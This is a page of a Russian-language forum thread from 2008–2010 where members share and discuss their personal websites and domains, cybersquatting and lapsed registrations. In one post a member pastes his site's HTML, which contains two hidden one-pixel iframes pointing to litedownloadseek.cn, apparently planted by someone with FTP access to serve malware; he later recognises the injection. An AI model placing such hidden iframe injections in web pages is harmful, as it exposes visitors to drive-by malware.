[ Обновленные темы · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 2 из 3
  • «
  • 1
  • 2
  • 3
  • »
Ваши сайты / Указываем ссылки и краткое описание
ExpertДата: Вторник, 14.10.2008, 11:57 | Сообщение # 16
Главный
Статус: Offline
Прикола ради регнул в воскресенье несколько доменов, в т.ч. syktsu.com
biggrin и sykt.biz. Повесил на парковку cool .

Кстати, кто-то мне говорил, что по домену syktsu.com в университет приходило письмо купить этот домен. Однако, по состоянию на 13.10.2008 он был свободен.

Блог декана

Уведомление для прессы и всех пользователей сети интернет: администрация форума может не заметить вовремя нецензурных слов и других, возможно, оскорбительных выражений/картинок/прочих материалов. Если вы заметили косвенный либо прямой факт оскорбления кого бы то ни было, пожалуйста, сообщите об этом администратору форума для принятия решения об удалении/модерировании соответствующего сообщения. Полный текст уведомления см. здесь.

ExpertДата: Вторник, 14.10.2008, 12:03 | Сообщение # 17
Главный
Quote (Expert)
Кстати, кто-то мне говорил, что по домену syktsu.com в университет приходило письмо купить этот домен. Однако, по состоянию на 13.10.2008 он был свободен.

Если что, я не при делах cool . Проверить, что регнут он был мной именно 13.10.2008 можно на любом WHOIS сервисе, например, здесь.

Я даже данные свои скрывать не стал tongue , а торговая марка syktsu не зарегистрирована.

Блог декана

Уведомление для прессы и всех пользователей сети интернет: администрация форума может не заметить вовремя нецензурных слов и других, возможно, оскорбительных выражений/картинок/прочих материалов. Если вы заметили косвенный либо прямой факт оскорбления кого бы то ни было, пожалуйста, сообщите об этом администратору форума для принятия решения об удалении/модерировании соответствующего сообщения. Полный текст уведомления см. здесь.

vitalyuДата: Вторник, 14.10.2008, 21:36 | Сообщение # 18
Генерал-полковник
Quote (Expert)
Проверить, что регнут он был мной именно 13.10.2008 можно на любом WHOIS сервисе, например, здесь.

Вообще впорядке подсуетились biggrin

Бог сумел сотворить мир всего за 6 дней только потому, что ему не нужно было решать проблемы совместимости с предыдущей версией.
...
Автомат Калашникова - это средство для превращения стэка в очередь...

ExpertДата: Вторник, 14.10.2008, 22:08 | Сообщение # 19
Главный
Quote (vitalyu)
Вообще впорядке подсуетились

Спасибо.

==
Ладно, "похвастаюсь" дальше biggrin .

Делать было натурально нечего в этой ситуации, и я взял еще syktyvkar.name и rkomi.info biggrin

Блог декана

EVILdoerДата: Среда, 15.10.2008, 02:24 | Сообщение # 20
[D]onatello
А у меня было уже много сайтов. Молчу про всяческие бесплатные хостинги, а покупные: http://zlodei.ru и http://lkdz.ru - первый канул в лету.. вернее, мы один раз затянули с оплатой и его (после 3-4 лет использования) перекупили ушлые киберсквоттеры (да, это реально, ребята sad ), второй - куплен совсем недавно: живёт, но пока как-то хмуро, т.к. времени у меня им заниматься сейчас почти нет - всё стараюсь по учёбе чем-нибудь занятся, да подработать...

vitalyu

Code
<!-- Copyright 2008, ASWEAteam          -->
<!-- Copyright 2008, Vitaly Uvarov      -->
<!-- ASWEA.ru LOGO is protected by law  -->
<!-- All rights reserved   -->

specool

ExpertДата: Среда, 15.10.2008, 07:00 | Сообщение # 21
Главный
Quote (EVILdoer)
первый канул в лету.. вернее, мы один раз затянули с оплатой и его (после 3-4 лет использования) перекупили ушлые киберсквоттеры (да, это реально, ребята

Это действительно реально. Киберсквоттеры или, в данном случае, просто ушлые домейнеры действительно караулят освобождающиеся домены и после дропа (освобождения) домена, тут же регистрируют его на себя. Конечно не все домены подпадают под такую "атаку", а только те, которые представляют коммерческую ценность. Скорее всего, EVILdoer, ваш домен такую ценность представлял, т.к. было

Quote (EVILdoer)
3-4 лет использования

и, значит, он был определенным образом раскручен и, скорее всего, трафик был приличный.

Сожалею, EVILdoer.

==
Те, кто имеет ценные для него домены - не забывайте продлевать. Потом придется заплатить гораздо дороже, но это не самое страшное. Страшное - как раз "дроп" домена и регистрация его другим лицом.

Я в 2001 г. потерял таким образом несколько серьезных доменов, которые сейчас стоят десятки тысяч рублей, а то и долларов. Называть их не буду, чтобы не делать рекламы нынешним владельцам...

Блог декана

vitalyuДата: Среда, 15.10.2008, 10:27 | Сообщение # 22
Генерал-полковник
Quote (EVILdoer)
vitalyu Code

Хы smile Чтобы непоняток не было, а лого вещь такая, плагиаторов много развелось .. Приходится хотя бы текстом пока защищаться smile

Quote (EVILdoer)

Балин. Обидно, обидно. Сколько тебя знаю, вы всегда на злодеях тусили ..

Бог сумел сотворить мир всего за 6 дней только потому, что ему не нужно было решать проблемы совместимости с предыдущей версией.
...
Автомат Калашникова - это средство для превращения стэка в очередь...

МихАДата: Воскресенье, 19.10.2008, 16:00 | Сообщение # 23
Генерал-лейтенант
Недавно переехал на новый хостинг и домен новый взял http://mihavxc.ru но пока что там "coming soon..." и пару приватных сервисов для себя любимого)
Очень хотел купить http://miha.ru .Связывался с владельцами....конкретную сумму не вспомню,но просили очень много))

Автоматизация антикафе
All active domain list
Личный блог

Сообщение отредактировал МихА - Воскресенье, 19.10.2008, 16:01

ExpertДата: Вторник, 17.03.2009, 21:50 | Сообщение # 24
Главный
Quote (Fantaziya)
Уважаемый, Expert! Простите за наглость, хотелось бы узнать Вы по шаблону сайт создавали или просто воспользовались чужими идеями? Просто я могу на вскидку могу, как минимум пару сайтов, скинуть с аналогичной динамикой и похожим дизайном... Правда создавались они немного ранее...

Часть сообщений перенесена в отдельную тему.

Блог декана

saginsaДата: Вторник, 17.03.2009, 23:31 | Сообщение # 25
Генерал-полковник
На kzi.mihavxc.ru

высветилось:

Имеется информация, что этот сайт атакует компьютеры!

Имеется информация о том, что сайт kzi.mihavxc.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.

Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры.

Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.

"Я планировала, но не думала ..."

Сообщение отредактировал saginsa - Вторник, 17.03.2009, 23:31

МихАДата: Среда, 18.03.2009, 01:52 | Сообщение # 26
Генерал-лейтенант
кстати пару месяцев назад одна знакомая тоже жаловалась,что такое вылазит.
Можешь глянуть на kzi.mihavxc.ru только 1 html'ка
Code
<html>
<title>Файлообменник для студентов КЗОИ СыктГУ</title><iframe src="http://litedownloadseek.cn/in.cgi?cocacola12" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola3" width=1 height=1 style="visibility: hidden"></iframe>
<h3><b>Файлообменник для студентов КЗОИ СыктГУ:</b></h3>
<br>
<a href='/kurs1'>Курс 1</a><br>
<a href='/kurs2'>Курс 2</a><br>
<a href='/kurs3'>Курс 3</a><br>
<a href='/kurs4'>Курс 4</a><br><br><br>

<a href='http://vkontakte.ru/club421420' target=_blank>Группа vkontakte.ru</a><br>
<a href='http://vkontakte.ru/board.php?act=topic&tid=1447435' target=_blank>Инструкция по закачиванию файлов</a><br>

</html>

все остальное - файлы залитые посетителями.
Как мне кажется файерфол паникует.У меня раньше аутпост тоже иногда кричал...."аааа паника,паника microsoft.com и google.com вас атакуют,берегитесь..."

Автоматизация антикафе
All active domain list
Личный блог

МихАДата: Воскресенье, 22.03.2009, 13:31 | Сообщение # 27
Генерал-лейтенант
я дурак:)
просмотрел в хмтл индекса iframe.
Доступ то к этому фтп имеют очень многие люди,вот какой-то умник iframe и прописал...
Подумываю поставить там полноценный php файлообменник,но так лень все файлы переносить....

Автоматизация антикафе
All active domain list
Личный блог

theintermanДата: Понедельник, 30.11.2009, 23:30 | Сообщение # 28
Генерал-полковник
Давно хотел поиграть с WordPress. Тут как раз ребята знакомые из Москвы предложили хостинг - свой сервер в Германии. Ну вообщем зарегал я в воскресенье домен - cuteblog.ru. четкой миссии у сайта нету - это скорее личный блог + галлерея + возможность для одногруппников скачивать файлы без всяких фри-хостингов и прочее. Пока WP почти не настраивал, но на неделе доведу до ума..

Каждый человек имеет право на жизнь, свободу и стремление к счастью (С) Т.Джефферсон

МихАДата: Суббота, 26.12.2009, 23:47 | Сообщение # 29
Генерал-лейтенант
Зарегал себе chukhlomin.com (ру был занят:((( ) просто так, в качестве странички с контактами.

Автоматизация антикафе
All active domain list
Личный блог

Сообщение отредактировал МихА - Суббота, 26.12.2009, 23:48

xisemДата: Суббота, 23.01.2010, 17:52 | Сообщение # 30
Майор
http://sites.google.com/site/xisart/

Добрый мир!

• Страница 2 из 3
  • «
  • 1